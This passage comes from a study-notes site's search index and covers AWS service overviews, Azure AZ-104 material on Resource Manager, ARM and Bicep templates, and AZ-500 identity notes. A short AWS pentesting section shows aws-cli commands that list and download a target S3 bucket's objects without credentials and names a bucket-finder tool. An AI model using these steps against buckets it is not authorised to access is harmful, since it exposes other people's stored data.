        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-neptune","title":"Amazon Neptune","text":"

        Fully managed graph database. A popular graph dataset would be a social network. Highly available across 3 AZs, with up to 15 read replicas. It can store up to billions of relations and query the graph with milliseconds of latency.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quantum-ledger-database-qldb","title":"Amazon Quantum Ledger Database (QLDB)","text":"
        • A ledger is a book recording financial transactions, and QLDB is used precisely to keep a ledger of financial transactions.
        • It's a fully managed database; it's serverless, highly available, and has replication of data across three AZs.
        • Used to review the history of all the changes made to your application data over time.
        • Immutable system: no entry can be removed or modified, and this is cryptographically verifiable.
        • Difference with Amazon Managed Blockchain: no decentralization component. QLDB has a central authority component and is a ledger, whereas Managed Blockchain has a decentralization component as well.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-managed-blockchain","title":"Amazon Managed Blockchain","text":"

        Managed Blockchain by Amazon is a service to join public blockchain networks or create your own scalable private blockchain network within AWS. It's compatible with two blockchain frameworks so far: Hyperledger Fabric and Ethereum.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-glue","title":"Amazon Glue","text":"

        Glue is a managed extract, transform, and load (ETL) service. It's fully serverless.

        ETL is very helpful when you have datasets that are not exactly in the right form for analytics; the ETL service prepares and transforms that data.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#glue-data-catalog","title":"Glue Data Catalog","text":"

        The Glue Data Catalog is a catalog of the datasets in your AWS infrastructure: it holds a reference to everything, such as the column names, the field names, the field types, et cetera.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#database-migration-service-dms","title":"Database Migration Service (DMS)","text":"

        DMS provides quick and secure database migration into AWS; it's resilient and self-healing.

        It supports both homogeneous and heterogeneous migrations.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-compute-services","title":"Amazon Compute Services","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-service-ecs","title":"Elastic Container Service (ECS)","text":"

        It's the way to launch containers in AWS. You must provision and maintain the infrastructure (EC2 instances). It has integrations with the Application Load Balancer.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#fargate","title":"Fargate","text":"

        It's also used to launch containers in AWS, but you don't need to provision the infrastructure (no EC2 instances to manage).

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-registry-ecr","title":"Elastic Container Registry (ECR)","text":"

        It's a private Docker registry on AWS. This is where you store your Docker images.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#lambda","title":"Lambda","text":"
        • It's a serverless compute service that allows you to run functions in the cloud. We have virtual functions, limited by time and they will run on-demand. You pay per request and compute time.
        • Lambda is event-driven: functions get invoked by AWS when needed.
        • It supports many languages.
        • Lambda can be run as a Lambda Container Image.

        The API Gateway service can expose Lambda functions as an HTTP API.
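
        A function can also be invoked directly from the CLI; a minimal sketch with a placeholder function name and payload:

        # Hedged sketch: invoke a Lambda function synchronously (function name and payload are placeholders)\naws lambda invoke --function-name my-function --cli-binary-format raw-in-base64-out --payload '{\"key\":\"value\"}' response.json\ncat response.json\n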

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-batch","title":"Amazon Batch","text":"

        Run batch jobs on AWS across EC2 managed instances.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-deployments-and-managing-infrastructure","title":"Amazon: Deployments and managing infrastructure","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloudformation","title":"AWS CloudFormation","text":"
        • Infrastructure as Code (IaC).
        • It creates the architecture and gives you the diagram.
        • In CloudFormation you create a Stack, select a template (which generates a YAML file), and configure other settings such as IAM permissions and costs (a minimal CLI sketch follows this list).
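
        A minimal sketch of creating a stack from a local template file (stack and file names are placeholders):

        # Hedged sketch: deploy a CloudFormation stack from a local template (names are placeholders)\naws cloudformation create-stack --stack-name my-stack --template-body file://template.yaml\n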
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-development-kit-cdk","title":"Amazon Cloud Development Kit (CDK)","text":"

        It allows you to define your cloud infrastructure using a familiar language. Code is compiled into a CloudFormation template.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-beanstalk","title":"Amazon Elastic Beanstalk","text":"

        Elastic Beanstalk is a developer centric view of deploying an application on AWS.

        It's PaaS.

        It has a full monitoring suite: a health agent pushes metrics to CloudWatch, checks for app health, and publishes health events.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#codedeploy","title":"CodeDeploy","text":"

        CodeDeploy deploys your application automatically.

        It's a hybrid service because it works with EC2 and on-premises servers.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codecommit","title":"AWS CodeCommit","text":"

        It's AWS's version-control code repository.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codebuild","title":"AWS CodeBuild","text":"

        It's a code-building service in the cloud. It compiles source code, runs tests, and produces packages that are ready to be deployed.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codepipeline","title":"AWS CodePipeline","text":"

        CodePipeline orchestrates the different steps to have the code automatically pushed to production. It's the basis for CI/CD (Continuous Integration and Continuous Delivery).

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codeartefact","title":"AWS CodeArtefact","text":"

        It's a service used to store and retrieve software package dependencies. It works with common dependency-management tools such as Maven, Gradle, npm, twine, pip, and NuGet. It's an artifact management system.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codestar","title":"AWS CodeStar","text":"

        Unified UI to easily manage software development activities in one place. You can edit the code directly in the cloud using AWS Cloud9.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloud9","title":"AWS Cloud9","text":"

        AWS Cloud9 is a cloud IDE for writing, running and debugging code directly in the cloud.

        Code collaboration in real time.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-global-applications","title":"Amazon Global Applications","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-route-53","title":"Amazon Route 53","text":"

        Managed DNS by AWS. It supports A, AAAA, and CNAME records.

        • Simple routing policy (no health checks).
        • Weighted routing policy (with percentages).
        • Latency routing policies (based on latency between users and servers).
        • Failover routing policy (for disaster recovery).
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloudfront","title":"Amazon CloudFront","text":"

        It's the AWS Content Delivery Network. So far it has 216 points of presence. It has DDoS protection. It improves read performance, since content is cached at the edge.

        Origins: S3 (protected with OAC Origin Access Control, that replaces OAI Origin Access Identity), Custom Origin HTTP.

        Files are cached for a TTL.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#s3-transfer-acceleration","title":"S3 Transfer Acceleration","text":"

        It increases transfer speed to and from S3 across regions by routing transfers through the AWS global network.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-global-accelerator","title":"AWS Global Accelerator","text":"

        Improve global application availability and performance using the AWS global network.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-outpost","title":"AWS Outpost","text":"

        AWS Outposts are \"server racks that offer the same AWS infrastructure, services, APIs & tools to build your own applications on-premises just as in the cloud\". This allows you to extend AWS services to your on-premises environment.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-wavelength","title":"AWS WaveLength","text":"

        AWS WaveLength Zones are infrastructure deployments embedded within telecommunications providers' datacenters at the edge of 5G networks. It brings AWS services to the edge of the 5G networks. Traffic never leaves the Communication Service Provider (CSP) networks.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-integrations","title":"Amazon Cloud integrations","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sqs","title":"Amazon SQS","text":"

        It's the Simple Queue Service. Two types:

        • Standard Queue is the oldest AWS offering. It's a fully managed service.
        • FIFO queues.

        It allows us to decouple applications, as the sketch below illustrates.
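
        A minimal sketch of the producer/consumer flow with the CLI (the queue name, account ID and URL are placeholders):

        # Hedged sketch: create a queue, then send and receive a message (names and URLs are placeholders)\naws sqs create-queue --queue-name my-queue\naws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/my-queue --message-body 'hello'\naws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/my-queue\n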

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-kinesis","title":"Amazon Kinesis","text":"

        It's a real-time big data streaming service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sns","title":"Amazon SNS","text":"

        Amazon SNS stands for Simple Notification Service. It creates a set of notifications about certain events. Event publishers send one message to one SNS topic, and each subscriber to the topic will get all the messages. It's a pub/sub service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-mq","title":"Amazon MQ","text":"

        Amazon MQ is a managed message broker service for two technologies, for RabbitMQ and for ActiveMQ.

        SQS and SNS are cloud-native services because they use proprietary protocols from AWS, with their own sets of APIs.

        If you are running a traditional application on-premises, you may use open protocols such as MQTT, AMQP, STOMP, OpenWire, or WSS. When migrating your application to the cloud, you may not want to re-engineer it to use the SQS and SNS protocols or APIs; instead, you want to keep using the traditional protocols you are used to, such as MQTT, AMQP, and so on. For this, we can use Amazon MQ.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-monitoring","title":"Amazon Cloud Monitoring","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/pentesting-aws/","title":"Pentesting Amazon Web Services (AWS)","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#amazon-s3","title":"Amazon S3","text":"

        S3 is an object storage service in the AWS cloud. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

        aws-cli can be used to list and download S3 objects, even without credentials when a bucket is public; a minimal sketch with a placeholder bucket name:
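
        # Hedged sketch: enumerate and fetch from a public bucket without credentials (bucket and file names are placeholders)\naws s3 ls s3://target-bucket --no-sign-request\naws s3 cp s3://target-bucket/interesting-file.txt . --no-sign-request\n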

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#enumerate-instances","title":"Enumerate instances","text":"

        insp3ctor: the AWS bucket finder.

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/az-104-preparation/","title":"AZ-104 Microsoft Azure Administrator certificate","text":"

        Sources of these notes

        • The Microsoft e-learn platform.
        • Udemy course: Prove your AZ-104 Microsoft Azure Administrator skills to the world. Updated.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#configure-azure-resources-with-tools","title":"Configure Azure resources with tools","text":"

        There's approximate parity between the portal, the Azure CLI, and Azure PowerShell with respect to the Azure objects they can administer and the configurations they can create. They're also all cross-platform. Typically, you'll consider several factors when making your choice:

        • Automation: Do you need to automate a set of complex or repetitive tasks? Azure PowerShell and the Azure CLI support automation, but Azure portal doesn't.
        • Learning curve: Do you need to complete a task quickly without learning new commands or syntax? The Azure portal doesn't require you to learn syntax or memorize commands. In Azure PowerShell and the Azure CLI, you must know the detailed syntax for each command you use.
        • Team skillset: Does your team have existing expertise? For example, your team might have used PowerShell to administer Windows. If so, they'll quickly become comfortable using Azure PowerShell.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"
        • Is temporary and requires a new or existing Azure Files share to be mounted.
        • Offers an integrated graphical text editor based on the open-source Monaco Editor.
        • Authenticates automatically for instant access to your resources.
        • Runs on a temporary host provided on a per-session, per-user basis.
        • Times out after 20 minutes without interactive activity.
        • Requires a resource group, storage account, and Azure File share.
        • Uses the same Azure file share for both Bash and PowerShell.
        • Is assigned to one machine per user account.
        • Persists $HOME using a 5-GB image held in your file share.
        • Permissions are set as a regular Linux user in Bash.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-powershell","title":"Azure PowerShell","text":"

        Azure PowerShell is a module that you add to Windows PowerShell or PowerShell Core to enable you to connect to your Azure subscription and manage resources. Azure PowerShell requires PowerShell to function. PowerShell provides services such as the shell window and command parsing. Azure PowerShell adds the Azure-specific commands.

        See cheat sheet for Azure PowerShell.
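
        A minimal session sketch with the Az PowerShell module; "<subscription-id>" is a placeholder:

        # Sign in interactively and pick a subscription
        Connect-AzAccount
        Get-AzSubscription
        Set-AzContext -Subscription "<subscription-id>"
        # List resource groups in the selected subscription
        Get-AzResourceGroup | Format-Table ResourceGroupName, Location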

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cli","title":"Azure CLI","text":"

        Azure CLI is a command-line program for connecting to Azure and executing administrative commands on Azure resources. It is available in two ways: inside a browser via the Azure Cloud Shell, or as a local installation on Linux, macOS, or Windows. It lets administrators and developers execute commands through a terminal, command-line prompt, or script instead of a web browser.

        See cheat sheet for Azure CLI.
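
        A minimal Azure CLI session sketch; "<subscription-id>" is a placeholder:

        # Sign in interactively and pick a subscription
        az login
        az account set --subscription "<subscription-id>"
        # List resource groups and VMs in table form
        az group list --output table
        az vm list --output table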

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-arm","title":"Azure Resource Manager (ARM)","text":"

        Azure Resource Manager provides several benefits:

        • You can deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
        • You can repeatedly deploy your solution throughout the development lifecycle and have confidence your resources are deployed in a consistent state.
        • You can manage your infrastructure through declarative templates rather than scripts.
        • You can define the dependencies between resources so they're deployed in the correct order.
        • You can apply access control to all services in your resource group because Role-Based Access Control (RBAC) is natively integrated into the management platform.
        • You can apply tags to resources to logically organize all the resources in your subscription.
        • You can clarify your organization's billing by viewing costs for a group of resources sharing the same tag.

        Two concepts that I need to review for this:

        • resource provider - A service that supplies the resources you can deploy and manage through Resource Manager. Each resource provider offers operations for working with the resources that are deployed. Some common resource providers are Microsoft.Compute, which supplies the virtual machine resource, Microsoft.Storage, which supplies the storage account resource, and Microsoft.Web, which supplies resources related to web apps. The Microsoft.KeyVault resource provider offers a resource type called vaults for creating the key vault, useful if you want to store keys and secrets. The name of a resource type is in the format: {resource-provider}/{resource-type}. For example, the key vault type is Microsoft.KeyVault/vaults. (A CLI sketch after this list shows how to inspect a provider's resource types.)
        • declarative syntax - Syntax that lets you state "Here is what I intend to create" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.
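
        As a sketch, the Azure CLI can inspect resource providers; Microsoft.KeyVault is used here only as the example namespace:

        # Resource types offered by one provider
        az provider show --namespace Microsoft.KeyVault --query "resourceTypes[].resourceType" --output table
        # Registration state of every provider in the subscription
        az provider list --query "[].{Provider:namespace, State:registrationState}" --output table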
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#resource-groups","title":"Resource groups","text":"

        Creating resource groups:

        • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
        • Each resource can only exist in one resource group.
        • You can add or remove a resource to a resource group at any time.
        • You can move a resource from one resource group to another group. Limitations do apply to moving resources.
        • A resource group can contain resources that reside in different regions.
        • A resource group can be used to scope access control for administrative actions.
        • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).

        When creating a resource group, you need to provide a location for that resource group. You may be wondering, "Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?" The resource group stores metadata about the resources. Therefore, when you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region.

        Moving resources:

        When moving resources, both the source group and the target group are locked during the operation. Write and delete operations are blocked on the resource groups until the move completes. This lock means you can't add, update, or delete resources in the resource groups. Locks don't mean the resources aren't available. For example, if you move a virtual machine to a new resource group, an application can still access the virtual machine.

        Move operation support for resources: this page details which resources can be moved between resource groups, subscriptions, and regions.

        To move resources, select the resource group containing those resources, and then select the\u00a0Move\u00a0button. Select the resources to move and the destination resource group. Acknowledge that you need to update scripts.
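
        A sketch of the Azure CLI equivalent of the portal's Move button; sourceRG, targetRG, and myVM are placeholders:

        # Look up the resource ID, then move the resource to the target group
        vm_id=$(az resource show --resource-group sourceRG --name myVM \
            --resource-type "Microsoft.Compute/virtualMachines" --query id --output tsv)
        az resource move --destination-group targetRG --ids "$vm_id"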

        Deleting resources:

        See how to remove a resource group using Azure PowerShell.
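
        A minimal Azure PowerShell sketch; the resource group name is a placeholder:

        # Deletes the group and every resource inside it; -Force skips the confirmation prompt
        Remove-AzResourceGroup -Name "myResourceGroup" -Force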

        Determine resource limits:

        • The limits shown are the limits for your subscription.
        • When you need to increase a default limit, there is a Request Increase link.
        • All resources have a maximum limit listed in Azure limits (see the CLI sketch after this list).
        • If you are at the maximum limit, the limit can't be increased.
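
        As an illustration, the Azure CLI can compare current compute usage against those limits; the region is a placeholder:

        # Current usage versus subscription limits for one region
        az vm list-usage --location westeurope --output table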
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-locks","title":"Azure Resource Manager Locks","text":"

        Creating Azure Resource Manager Locks:

        Resource Manager locks allow organizations to put a structure in place that prevents the accidental deletion of resources in Azure.

        • You can associate the lock with a subscription, resource group, or resource.
        • Locks are inherited by child resources.

        Only the Owner and User Access Administrator roles can create or delete management locks.
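
        A minimal Azure CLI sketch for working with locks; the lock and resource group names are placeholders:

        # Prevent accidental deletion of a resource group
        az lock create --name NoDelete --resource-group myResourceGroup --lock-type CanNotDelete
        # List and remove locks
        az lock list --resource-group myResourceGroup --output table
        az lock delete --name NoDelete --resource-group myResourceGroup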

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-template","title":"Azure Resource Manager template","text":"

        An Azure Resource Manager template precisely defines all the Resource Manager resources in a deployment. These are some benefits:

        • Templates improve consistency. Resource Manager templates provide a common language for you and others to describe your deployments. Regardless of the tool or SDK that you use to deploy the template, the structure, format, and expressions inside the template remain the same.
        • Templates help express complex deployments. Templates enable you to deploy multiple resources in the correct order. For example, you wouldn't want to deploy a virtual machine prior to creating an operating system (OS) disk or network interface. Resource Manager maps out each resource and its dependent resources, and creates dependent resources first. Dependency mapping helps ensure that the deployment is carried out in the correct order.
        • Templates reduce manual, error-prone tasks. Manually creating and connecting resources can be time consuming, and it's easy to make mistakes. Resource Manager ensures that the deployment happens the same way every time.
        • Templates are code. Templates express your requirements through code. Think of a template as a type of Infrastructure as Code that can be shared, tested, and versioned similar to any other piece of software. Also, because templates are code, you can create a "paper trail" that you can follow. The template code documents the deployment. Most users maintain their templates under some kind of revision control, such as Git. When you change the template, its revision history also documents how the template (and your deployment) has evolved over time.
        • Templates promote reuse. Your template can contain parameters that are filled in when the template runs. A parameter can define a username or password, a domain name, and so on. Template parameters enable you to create multiple versions of your infrastructure, such as staging and production, while still using the exact same template.
        • Templates are linkable. You can link Resource Manager templates together to make the templates themselves modular. You can write small templates that each define a piece of a solution, and then combine them to create a complete system.
        • Templates simplify orchestration. You only need to deploy the template to deploy all of your resources. Normally this would take multiple operations.

        The template uses a\u00a0declarative syntax. The declarative syntax is a way of building the structure and elements that outline what resources will look like without describing the control flow. Declarative syntax is different than imperative syntax, which uses commands for the computer to perform. Imperative scripting focuses on specifying each step in deploying the resources.

        ARM templates are idempotent, which means you can deploy the same template many times and get the same resource types in the same state.

        Resource Manager orchestrates deploying the resources so they're created in the correct order. When possible, resources will also be created in parallel, so ARM template deployments finish faster than scripted deployments.

        Resource Manager also has built-in validation. It checks the template before starting the deployment to make sure the deployment will succeed.

        You can also integrate your ARM templates into continuous integration and continuous deployment (CI/CD) tools like Azure Pipelines.

        The schema:

        {\n    \"$schema\": \"http://schema.management.\u200bazure.com/schemas/2019-04-01/deploymentTemplate.json#\",\u200b\n    \"contentVersion\": \"\",\u200b\n    \"parameters\": {},\u200b\n    \"variables\": {},\u200b\n    \"functions\": [],\u200b\n    \"resources\": [],\u200b\n    \"outputs\": {}\u200b\n}\n
        The elements of the schema:
        • $schema (required): Location of the JSON schema file that describes the version of the template language. Use the URL shown in the preceding example.
        • contentVersion (required): Version of the template (such as 1.0.0.0). You can provide any value for this element. Use this value to document significant changes in your template and to make sure that the right template is being used.
        • parameters (optional): Values that are provided when deployment is executed to customize resource deployment.
        • variables (optional): Values that are used as JSON fragments in the template to simplify template language expressions.
        • functions (optional): User-defined functions that are available within the template.
        • resources (required): Resource types that are deployed or updated in a resource group.
        • outputs (optional): Values that are returned after deployment.

        Let's start with parameters:

        \"parameters\": {\n    \"<parameter-name>\" : {\n        \"type\" : \"<type-of-parameter-value>\",\n        \"defaultValue\": \"<default-value-of-parameter>\",\n        \"allowedValues\": [ \"<array-of-allowed-values>\" ],\n        \"minValue\": <minimum-value-for-int>,\n        \"maxValue\": <maximum-value-for-int>,\n        \"minLength\": <minimum-length-for-string-or-array>,\n        \"maxLength\": <maximum-length-for-string-or-array-parameters>,\n        \"metadata\": {\n        \"description\": \"<description-of-the parameter>\"\n        }\n    }\n}\n

        This would be an example:

        \"parameters\": {\n  \"adminUsername\": {\n    \"type\": \"string\",\n    \"metadata\": {\n      \"description\": \"Username for the Virtual Machine.\"\n    }\n  },\n  \"adminPassword\": {\n    \"type\": \"securestring\",\n    \"metadata\": {\n      \"description\": \"Password for the Virtual Machine.\"\n    }\n  }\n}\n

        You're limited to 256 parameters in a template. You can reduce the number of parameters by using objects that contain multiple properties.

        Azure Quickstart Templates are Azure Resource Manager templates provided by the Azure community. Some templates provide everything you need to deploy your solution, while others might serve as a starting point for your template.

        • The README.md file provides an overview of what the template does.
        • The azuredeploy.json file defines the resources that will be deployed.
        • The azuredeploy.parameters.json file provides the values the template needs.

        It caught my eye: https://github.com/azure/azure-quickstart-templates/tree/master/application-workloads/blockchain/blockchain

        You can deploy an ARM template to Azure in one of the following ways:
        • Deploy a local template
        • Deploy a linked template
        • Deploy in a continuous deployment pipeline

        Example: To add a resource to your template, you'll need to know the resource provider and its types of resources. The syntax for this combination is in the form of {resource-provider}/{resource-type}.

        See the code:

        {\n  \"$schema\": \"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#\",\n  \"contentVersion\": \"1.0.0.1\",\n  \"apiProfile\": \"\",\n  \"parameters\": {},\n  \"variables\": {},\n  \"functions\": [],\n  \"resources\": [\n    {\n      \"type\": \"Microsoft.Storage/storageAccounts\",\n      \"apiVersion\": \"2019-06-01\",\n      \"name\": \"learntemplatestorage123\",\n      \"location\": \"westus\",\n      \"sku\": {\n        \"name\": \"Standard_LRS\"\n      },\n      \"kind\": \"StorageV2\",\n      \"properties\": {\n        \"supportsHttpsTrafficOnly\": true\n      }\n    }\n  ],\n  \"outputs\": {}\n}\n

        To create an ARM template, use Visual Studio Code with the "Azure Resource Manager (ARM) Tools for Visual Studio Code" extension.
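
        A minimal deployment sketch with the Azure CLI, assuming the quickstart-style file names above; the resource group and username values are placeholders:

        # Deploy a local template into an existing resource group, overriding one parameter
        az deployment group create \
            --resource-group myResourceGroup \
            --template-file azuredeploy.json \
            --parameters adminUsername=azureuser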

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#biceps-templates","title":"Biceps templates","text":"

        Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources. In a Bicep file, you define the infrastructure you want to deploy to Azure, and then use that file throughout the development lifecycle to repeatedly deploy your infrastructure. Your resources are deployed in a consistent manner. Bicep provides concise syntax, reliable type safety, and support for code reuse. Bicep offers a first-class authoring experience for your infrastructure-as-code solutions in Azure.

        How does Bicep work?

        When you deploy a resource or series of resources to Azure, the tooling that's built into Bicep converts your Bicep template into a JSON template. This process is known as transpilation. Transpilation is the process of converting source code written in one language into another language.

        Bicep provides many improvements over JSON for template authoring, including:

        • Simpler syntax: Bicep provides a simpler syntax for writing templates. You can reference parameters and variables directly, without using complicated functions. String interpolation is used in place of concatenation to combine values for names and other items. You can reference the properties of a resource directly by using its symbolic name instead of complex reference statements. These syntax improvements help both with authoring and reading Bicep templates.

        • Modules: You can break down complex template deployments into smaller module files and reference them in a main template. These modules provide easier management and greater reusability.

        • Automatic dependency management: In most situations, Bicep automatically detects dependencies between your resources. This process removes some of the work involved in template authoring.

        • Type validation and IntelliSense: The Bicep extension for Visual Studio Code features rich validation and IntelliSense for all Azure resource type API definitions. This feature helps provide an easier authoring experience.
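
        Because Bicep transpiles to ARM JSON, deployment uses the same tooling. A minimal sketch; the file and resource group names are placeholders:

        # Transpile a Bicep file to ARM JSON to inspect the output (optional)
        az bicep build --file main.bicep
        # Deploy the Bicep file directly; the CLI transpiles it for you
        az deployment group create --resource-group myResourceGroup --template-file main.bicep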

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/","title":"I. Manage Identity and Access","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should be able to answer for the AZ-500 certificate

        Azure Active Directory (Azure AD) is a cloud-based identity and access management service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#1-microsoft-entra-id","title":"1. Microsoft Entra ID","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#11-microsoft-entra-id-licenses","title":"1.1. Microsoft Entra ID licenses","text":"
        • Azure Active Directory Free. Provides user and group management, on-premises directory synchronization, basic reports, self-service password change for cloud users, and single sign-on across Azure, Microsoft 365, and many popular SaaS apps.
        • Azure Active Directory Premium P1. In addition to the Free features, P1 lets your hybrid users access both on-premises and cloud resources. It also supports advanced administration, such as dynamic groups, self-service group management, Microsoft Identity Manager, and cloud write-back capabilities, which allow self-service password reset for your on-premises users.
        • Azure Active Directory Premium P2. In addition to the Free and P1 features, P2 also offers Azure Active Directory Identity Protection to help provide risk-based Conditional Access to your apps and critical company data and Privileged Identity Management to help discover, restrict, and monitor administrators and their access to resources and to provide just-in-time access when needed.
        • "Pay as you go" feature licenses. You also get additional feature licenses, such as Azure Active Directory Business-to-Customer (B2C). B2C can help you provide identity and access management solutions for your customer-facing apps.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#12-azure-active-directory-domain-services-azure-ad-ds","title":"1.2. Azure Active Directory Domain Services (Azure AD DS)","text":"

        There are two ways to provide Active Directory Domain Services in the cloud:

        • A managed domain that you create using Azure Active Directory Domain Services (Azure AD DS). Microsoft creates and manages the required resources. Azure AD DS deploys, manages, patches, and secures the Active Directory Domain Services infrastructure for you. It's a managed domain experience. Azure AD DS provides a smaller subset of features than a traditional self-managed AD DS environment, which reduces some of the design and management complexity. For example, there are no AD forests, domains, sites, or replication links to design and maintain. It also provides access to traditional authentication mechanisms such as Kerberos and NTLM.
        • A self-managed domain that you create and configure using traditional resources such as virtual machines (VMs), Windows Server guest OS, and Active Directory Domain Services (AD DS). You then continue to administer these resources, and you're able to do additional tasks, such as extending the schema or creating forest trusts. Common deployment models in a self-managed domain are:
          • Standalone cloud-only AD DS: Azure VMs are configured as domain controllers, and a separate, cloud-only AD DS environment is created. This AD DS environment doesn't integrate with an on-premises AD DS environment. A different set of credentials is used to sign in and administer VMs in the cloud.
          • Resource forest deployment: Azure VMs are configured as domain controllers, and an AD DS domain that's part of an existing forest is created. A trust relationship is then configured to an on-premises AD DS environment. Other Azure VMs can domain-join this resource forest in the cloud. User authentication runs over a VPN / ExpressRoute connection to the on-premises AD DS environment.
          • Extend on-premises domain to Azure: An Azure virtual network connects to an on-premises network using a VPN / ExpressRoute connection. Azure VMs connect to this Azure virtual network, which lets them domain-join to the on-premises AD DS environment. An alternative is to create Azure VMs and promote them as replica domain controllers from the on-premises AD DS domain. These domain controllers replicate over a VPN / ExpressRoute connection to the on-premises AD DS environment. The on-premises AD DS domain is effectively extended into Azure.

